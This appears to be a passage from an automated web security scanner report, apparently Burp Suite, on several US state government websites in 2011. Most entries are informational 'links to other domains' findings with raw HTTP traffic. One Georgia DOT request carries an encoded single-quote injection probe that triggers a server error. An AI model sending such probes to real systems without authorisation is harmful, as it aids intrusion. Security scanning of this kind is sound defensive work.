Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Sat, 30 Apr 2011 12:31:21 GMT
Content-Type: text/html; charset=UTF-8
Server: JRun Web Server


                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

   <title>GDOT-Office of Construction Bidding Administration</title>

   
...[SNIP]...
ntractsAdministration/index.cfm;
                   this path: http://www.cloverleaf.net/cgi-bin/expedite/get-expedite.pl
                   collapsed: http://www.cloverleaf.net/cgi-bin/expedite/get-expedite.pl
                   -->
                   <a href="http://www.cloverleaf.net/cgi-bin/expedite/get-expedite.pl" class="extLink"><img src="images/download.gif" width="16" height="16" alt="Download" />
...[SNIP]...

19.26. http://tomcat2.dot.state.ga.us/ContractsAdministration/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tomcat2.dot.state.ga.us
Path:   /ContractsAdministration/index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ContractsAdministration/index.cfm?a=a&fuseaction=dynamic.section&secID=%2527 HTTP/1.1
Host: tomcat2.dot.state.ga.us
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 500 Internal Server Error
server-error: true
Date: Sat, 30 Apr 2011 17:50:07 GMT
Content-Type: text/html; charset=UTF-8
Server: JRun Web Server


                                                                                           <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></
...[SNIP]...
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a>
...[SNIP]...
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a>
...[SNIP]...

19.27. http://www.adfg.alaska.gov/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfg.alaska.gov
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.cfm?adfg=pressreleases.pr04062011 HTTP/1.1
Host: www.adfg.alaska.gov
Proxy-Connection: keep-alive
Referer: http://www.adfg.alaska.gov/index.cfm?adfg=home.main
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=2291309; CFTOKEN=17665214; JSESSIONID=7A6859BD0D4A6C20751FFBA83725C502; __utmz=75571018.1304201637.1.1.utmcsr=alaska.gov|utmccn=(referral)|utmcmd=referral|utmcct=/quote.html; __utma=75571018.131292954.1304201637.1304201637.1304201637.1; __utmc=75571018; __utmb=75571018.1.10.1304201637

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 22:18:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Via: 1.1 www.adfg.alaska.gov
Content-Length: 52420

<!DOCTYPE html>
   
   
                                                           <html lang="en-us">
   <head>
<title>Permits Available for Interior Alaska Hunts, Alaska Department of Fish and Game</title>
<
...[SNIP]...
<li><a href="https://myalaska.state.ak.us/home/app">myAlaska</a>
...[SNIP]...
<li><a href="https://www.admin.adfg.state.ak.us/buyonline">Buy a License Online</a>
...[SNIP]...
<li><a href="https://www.admin.adfg.state.ak.us/buyonline">Buy Now!</a>
...[SNIP]...
<li><a href="http://www.legis.state.ak.us/basis/folioproxy.asp?url=http://wwwjnu01.legis.state.ak.us/cgi-bin/folioisa.dll/aac/query=[JUMP:%27Title5Chap77%27]/doc/{@1}/hits_only?firsthit">Personal Use Regulations</a>
...[SNIP]...
<li><a href="http://tagotoweb.adfg.state.ak.us/">Mark Tag and Age Lab</a>
...[SNIP]...
<li><a href="https://www.admin.adfg.state.ak.us/buyonline">Buy your License</a>
...[SNIP]...
<li class="beginsub">
       <a href="http://notes.state.ak.us/pn/pubnotic.nsf/PNByDeptActive?OpenView">Public Notices</a>
...[SNIP]...
<li><a href="https://myalaska.state.ak.us/home/app">myAlaska</a>
...[SNIP]...

19.28. http://www.alabama.gov/portal/secondary.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/secondary.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /portal/secondary.jsp?sid=onlineServices HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; __utmz=222685003.1304126433.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; __utma=222685003.1298336245.1304123819.1304123819.1304126433.2; __utmc=222685003; __utmb=222685003.1.10.1304126433

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:23:18 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Content-Type: text/html
Content-Length: 26204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<br />
<a href="http://www.facebook.com/alabamagov" id="stayconnected_con" target="_blank"><img src="/images/staycon_facebook.png" width="13" height="13" alt="Facebook" />
...[SNIP]...
<br />

<a href="http://www.flickr.com/photos/alabama_tourism/" id="stayconnected_con" target="_blank"><img src="/images/staycon_flickr.png" width="13" height="13" alt="Flicker" />
...[SNIP]...
<br />
<a href="http://twitter.com/alabamagov" id="stayconnected_con" target="_blank"><img src="/images/staycon_twitter.png" width="13" height="13" alt="Twitter" />
...[SNIP]...
<td>


<link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" />


<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<br />
<a href="http://server.iad.liveperson.net/hc/42550049/?cmd=file&file=visitorWantsToChat&site=42550049&byhref=1&imageUrl=http://www.alabama.gov/images/livehelp" target="_blank"><img src="/images/secondary_livechat.png" alt="Click here for live help" name="livehelp" border="0" id="livehelp"/>
...[SNIP]...
<!--Banner Ads-->

        <a href="https://www.alabamainteractive.org/inmateCanteen/" target="_blank"><img src="/images/featuredServices/ad_conBucks.jpg" alt="" border="0"/>
...[SNIP]...
<img src="/images/trans_spanish.gif" alt="alabama.gov en Espanol" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|es&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Spanish</a>
...[SNIP]...
<img src="/images/trans_german.gif" alt="alabama.gov auf Deutsch" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|de&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">German</a>
...[SNIP]...
<img src="/images/trans_korean.gif" alt="Korean alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ko&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Korean</a>
...[SNIP]...
<img src="/images/trans_japanese.gif" alt="Japanese alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ja&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Japanese</a>
...[SNIP]...
<br />
   <a href="http://www.centerdigitalgov.com/survey/88/2010" target="_blank">Best of Web Winner 2010</a><br />
   <a href="http://www.centerdigitalgov.com/survey/88/2009" target="_blank">Best of Web Finalist 2009</a><br />
   <a href="http://www.centerdigitalgov.com/survey/88/2008" target="_blank">Best of Web Winner 2008</a>
...[SNIP]...
</a> | <a href="http://www.usa.gov" target="_blank">USA.gov</a>
...[SNIP]...

19.29. http://www.alabama.gov/portal/secondary.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alabama.gov
Path:   /portal/secondary.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /portal/secondary.jsp?id=professional HTTP/1.1
Host: www.alabama.gov
Proxy-Connection: keep-alive
Referer: http://www.alabama.gov/portal/secondary.jsp?sid=onlineServices
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=abczMjORTQ-kQ6HiE_J_s; __utmz=222685003.1304126433.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/9; alabama_gov_style=standardText; __utma=222685003.1298336245.1304123819.1304123819.1304126433.2; __utmc=222685003; __utmb=222685003.2.10.1304126433

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:21:48 GMT
Server: Apache/1.3.41 (Unix) Resin/3.0.25
Content-Type: text/html
Content-Length: 40696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<br />
<a href="http://www.facebook.com/alabamagov" id="stayconnected_con" target="_blank"><img src="/images/staycon_facebook.png" width="13" height="13" alt="Facebook" />
...[SNIP]...
<br />

<a href="http://www.flickr.com/photos/alabama_tourism/" id="stayconnected_con" target="_blank"><img src="/images/staycon_flickr.png" width="13" height="13" alt="Flicker" />
...[SNIP]...
<br />
<a href="http://twitter.com/alabamagov" id="stayconnected_con" target="_blank"><img src="/images/staycon_twitter.png" width="13" height="13" alt="Twitter" />
...[SNIP]...
<td>


<link rel="stylesheet" href="http://www.google.com/cse/style/look/default.css" type="text/css" />


<script src="http://www.google.com/jsapi" type="text/javascript"></script>
...[SNIP]...
<br />
<a href="http://server.iad.liveperson.net/hc/42550049/?cmd=file&file=visitorWantsToChat&site=42550049&byhref=1&imageUrl=http://www.alabama.gov/images/livehelp" target="_blank"><img src="/images/secondary_livechat.png" alt="Click here for live help" name="livehelp" border="0" id="livehelp"/>
...[SNIP]...
<!--Banner Ads-->

        <a href="https://www.alabamainteractive.org/dorpt/UserTagChoice.str" target="_blank"><img src="/images/featuredServices/ad_dorpt.jpg" alt="" border="0"/>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/abc_license/" target="_blank">Alabama Alcoholic Beverage License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/abela_lr/" target="_blank">Landscape Architects License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/arecmenu/" target="_blank">Real Estate Commission License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/arecmenu/" target="_blank">Real Estate Commission Course Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbrt_Initial/" target="_blank">Board of Respiratory Therapy Initial License</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbrt_lr/" target="_blank">Board of Respiratory Therapy License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/vet_faculty/" target="_blank">Veterinary Medical Examiners Faculty License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/lvt_lr/" target="_blank">Veterinary Medical Examiners License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/plumber_lr/" target="_blank">Plumbers and Gas Fitters License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/EmsProvider/Welcome.do" target="_blank">Department of Public Health, EMS Provider Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/homebuild_newApplications/" target="_blank">Home Builders Licensure Board, New License Application</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/homebuild_newInactive/" target="_blank">Home Builders Licensure Board, New Inactive License Applicaiton</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/homebuild_renewal/" target="_blank">Home Builders Licensure Board, License Renewal Application</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/homebuild_expired/" target="_blank">Home Builders Licensure Board, Expired License Application</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/homebuild_inactive/" target="_blank">Home Builders Licensure Board, Inactive License Application</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbd_slr/" target="_blank">State Banking, Small Loan License Renewal </a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbl_pels_ca/" target="_blank">Professional Engineers and Land Surveyors Certificate of Authorization</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbl_pels/" target="_blank">Professional Engineers and Land Surveyors License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/ethics_registration/" target="_blank">Ethics Commission Lobbyist Registration</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/forest/welcome.action" target="_blank">Board of Registration for Foresters, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/hmesp_lr/" target="_blank">Home Medical Equipment Service Providers, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/hmesp_initial/welcome.action" target="_blank">Home Medical Equipment Service Providers, Initial License</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/lpgas_motorfuel/" target="_blank">Liquified Petroleum Gas Board, Motor Fuel Decal Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/lpgas_permit/" target="_blank">Liquified Petroleum Gas Board, Permit Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/mft/welcome.action" target="_blank">Marriage and Family Therapy, License Renewal </a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/reabren/Login.do" target="_blank">Real Estate Appraisers Board, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/abcr_initial/" target="_blank">Board of Court Reporters, Initial License </a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/abcr/" target="_blank">Board of Court Reporters, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/abswe_pip/" target="_blank">Social Work Examiners, Private Independant Practice License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/alabar_sr/" target="_blank">Alabama State Bar, Section Application</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/albit/" target="_blank">Licensure Board for Interpreters and Transliterators, License Application</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/albpt/" target="_blank">Board of Physical Therapy, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbce/" target="_blank">Alabama State Board of Chiropractic Examiners</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbpa_fr/" target="_blank">Alabama State Board of Public Accountancy, Firm Registration</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/asbrt_lr/" target="_blank">Alabama State Board of Respiratory Therapy, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/boa_lr/" target="_blank">Alabama Board of Architects, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/BoothRen/" target="_blank">Alabama Board of Cosmetology, Booth Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/coslir/user/login.do" target="_blank">Alabama Board of Cosmetology, License Renewal</a>
...[SNIP]...
<div class="headingTextDiv">

<a href="https://www.alabamainteractive.org/education/" target="_blank">Alabama Department of Education, Educator/Leadership Certificates / Substitute License</a>
...[SNIP]...
<img src="/images/trans_spanish.gif" alt="alabama.gov en Espanol" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|es&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Spanish</a>
...[SNIP]...
<img src="/images/trans_german.gif" alt="alabama.gov auf Deutsch" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|de&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">German</a>
...[SNIP]...
<img src="/images/trans_korean.gif" alt="Korean alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ko&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Korean</a>
...[SNIP]...
<img src="/images/trans_japanese.gif" alt="Japanese alabama.gov" width="19" height="11"/> <a href="http://translate.google.com/translate?u=http%3A%2F%2Fwww.alabama.gov%2Fportal%2Fstyle_text%2Fsecondary.jsp%3Fid%3DportalResourcesTranslationDisclaimer&langpair=en|ja&hl=en&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools">Japanese</a>
...[SNIP]...
<br />
   <a href="http://www.centerdigitalgov.com/survey/88/2010" target="_blank">Best of Web Winner 2010</a><br />
   <a href="http://www.centerdigitalgov.com/survey/88/2009" target="_blank">Best of Web Finalist 2009</a><br />
   <a href="http://www.centerdigitalgov.com/survey/88/2008" target="_blank">Best of Web Winner 2008</a>
...[SNIP]...
</a> | <a href="http://www.usa.gov" target="_blank">USA.gov</a>
...[SNIP]...

19.30. http://www.coloradochannel.net/sites/all/modules/browser_update_popup/js/browser_update_popup.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradochannel.net
Path:   /sites/all/modules/browser_update_popup/js/browser_update_popup.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /sites/all/modules/browser_update_popup/js/browser_update_popup.js?D HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.coloradochannel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=pr3o6cnkqcgvda1n4st4t8ob24

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:38 GMT
Server: Apache
Last-Modified: Tue, 14 Dec 2010 17:37:05 GMT
ETag: "f427d-a27-4976244e09240"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 2599

var bUP = bUP || {};

bUP.params = function() {
// If we pursue this module this should be generated by .module.
bUP.browserMap = {
mozilla: {
version: 1910,
message: 'Your version of Firefox is out of date. Some elements on this site may not display correctly. <a href="http://www.mozilla.com/en-US/firefox/update/">Please update your browser</a>. Click anywhere to dismiss this message.'
},
msie: {
version: 60,
message: 'Your version of Internet Explorer is out of date. Some elements on this site may not display correctly. <a href="http://www.microsoft.com/windows/downloads/default.aspx">Please update your browser</a>
...[SNIP]...

19.31. http://www.coloradochannel.net/sites/all/modules/lightbox2/js/lightbox_video.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coloradochannel.net
Path:   /sites/all/modules/lightbox2/js/lightbox_video.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /sites/all/modules/lightbox2/js/lightbox_video.js?D HTTP/1.1
Host: www.coloradochannel.net
Proxy-Connection: keep-alive
Referer: http://www.coloradochannel.net/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS8c46cefb3d49ee625c6d0242934806ee=pr3o6cnkqcgvda1n4st4t8ob24

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:32:38 GMT
Server: Apache
Last-Modified: Wed, 15 Dec 2010 02:32:59 GMT
ETag: "f8181-2132-49769c167acc0"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 8498

/* $Id: lightbox_video.js,v 1.1.4.20 2010/09/21 17:57:22 snpower Exp $ */

/**
* Lightbox video
* @author
* Stella Power, <http://drupal.org/user/66894>
*/

var Lightvideo = {

// startVideo()
...[SNIP]...
(href) {
if (Lightvideo.checkKnownVideos(href)) {
return;
}
else if (href.match(/\.mov$/i)) {
if (navigator.plugins && navigator.plugins.length) {
Lightbox.modalHTML ='<object id="qtboxMovie" type="video/quicktime" codebase="http://www.apple.com/qtactivex/qtplugin.cab" data="'+href+'" width="'+Lightbox.modalWidth+'" height="'+Lightbox.modalHeight+'"><param name="allowFullScreen" value="true">
...[SNIP]...
</object>';
} else {
Lightbox.modalHTML = '<object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" codebase="http://www.apple.com/qtactivex/qtplugin.cab" width="'+Lightbox.modalWidth+'" height="'+Lightbox.modalHeight+'" id="qtboxMovie"><param name="allowFullScreen" value="true">
...[SNIP]...

19.32. http://www.ct.gov/ctportal/cwp/view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ct.gov
Path:   /ctportal/cwp/view.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ctportal/cwp/view.asp?a=843&q=431930 HTTP/1.1
Host: www.ct.gov
Proxy-Connection: keep-alive
Referer: http://www.ct.gov/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=64328189.1304117373.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=64328189.80047175.1304117373.1304117373.1304117373.1; __utmc=64328189; __utmb=64328189.1.10.1304117373

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 22:49:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30177
Content-Type: text/html
Set-Cookie: ctportalNav%5FGID=; path=/ctportal
Set-Cookie: ctportalNav=; path=/ctportal
Set-Cookie: ctportal=LoginJumpBackTo=%2Fctportal%2Fcwp%2Fview%2Easp%3Fa%3D843%26q%3D431930&AA=False&PGT=&UA=Guest&AN=&AG=&Q=CF83CBC7&ln=&TC=06108&CA=CF83CBC7&II=&TU=CF83CBC7&FN=Guest&ILO=False&rn=&NB=False&F=CE83CBC6&SSL=False&EA=&SA=False; domain=www.ct.gov; path=/ctportal
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML LANG="en-us">
   <DSFHEADER>
   <!--stopindex-->
   <HEAD>

       <!--
           This site was built with PPT DSF Technology
       Dynamic S
...[SNIP]...
<LI class=selected><A class=tab id=searchform-tab href="http://usasearch.gov/search"><IMG id=ssImage onclick=swapImage(1) alt="Site Search" src="../lib/ctportal/site_search_active.jpg" border=0>
...[SNIP]...
<DIV align=center><A href="http://www.ctvisit.com/"><IMG border=0 alt="Connecticut - Select Here to Visit CTVisit.com" vspace=5 src="../lib/ctportal/v4/ct_visit.jpg">
...[SNIP]...
<BR><A href="http://www.infoline.org/"><IMG border=0 alt="2-1-1 Infoline" vspace=5 src="../lib/ctportal/v4/211.jpg">
...[SNIP]...
<BR><A href="http://www.ctlottery.org/"><IMG border=0 alt="Link For CT Lottery" src="../lib/ctportal/v4/ct_lottery.jpg">
...[SNIP]...
<FONT color=#000099><A href="http://www.commnet.edu/directory.asp ">Connecticut Community Colleges </A>
...[SNIP]...
<LI><A href="http://www.ctstateu.edu/system_office/directories.htm#csu_system_office"><FONT color=#000099>
...[SNIP]...
<LI><A href="http://www.jud.state.ct.us/scripts/DirDefault.asp"><FONT color=#000099>
...[SNIP]...
<LI><A href="http://phonebk.uconn.edu/"><FONT color=#000099>
...[SNIP]...
<LI><A href="http://www11.uchc.edu/"><FONT color=#000099>
...[SNIP]...
<SPAN><A href="http://www.cga.state.ct.us"></A>
...[SNIP]...
<LI>Contact information for Connecticut members of the U.S. House of Representatives is available at <A href="http://clerk.house.gov"><FONT color=#000099>
...[SNIP]...
<LI>Contact information for Connecticut's U.S. Senators is available at <A href="http://www.senate.gov/general/contact_information/senators_cfm.cfm?State=CT"><FONT color=#000099>
...[SNIP]...
</FONT><A class=noUnderline href="http://www.cslib.org/asklib.htm"><FONT color=#000000 size=1>
...[SNIP]...
</A>, and <A href="http://www.cmac.state.ct.us/access/policies/accesspolicy40.html">Web Site Accessibility Policy</A>
...[SNIP]...

19.33. http://www.dhh.louisiana.gov/offices/page.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dhh.louisiana.gov
Path:   /offices/page.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /offices/page.asp?id=252&detail=7752 HTTP/1.1
Host: www.dhh.louisiana.gov
Proxy-Connection: keep-alive
Referer: http://la.gov/Government/Boards_and_Commissions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 01:02:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 40278
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAQAAASST=HIHALCJBOLEPJJHMFLAMHGEP; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Records and Statistics (Vital Records) - Center for Records and Statistics - Office of Public Health - Lo
...[SNIP]...
<P><A href="http://www.vitalchek.com/Campaign?site=2&amp;clickid=646829930273374210" target=_blank><IMG border=0 alt="Internet Request" align=left src="/offices/images/imgs-252/Birth Certificates/Internet.jpg">
...[SNIP]...
</P><A href="https://www.vitalchek.com/agency_locator.aspx?providerID=90218" target=_blank></A>
...[SNIP]...
</FONT><A href="http://www.vitalchek.com/Campaign?site=2&amp;clickid=646829930273374210" target=_blank><FONT size=2>
...[SNIP]...
</FONT><A href="http://www.vitalchek.com/Campaign?site=2&amp;clickid=646829930273374210" target=_blank><FONT size=2>
...[SNIP]...
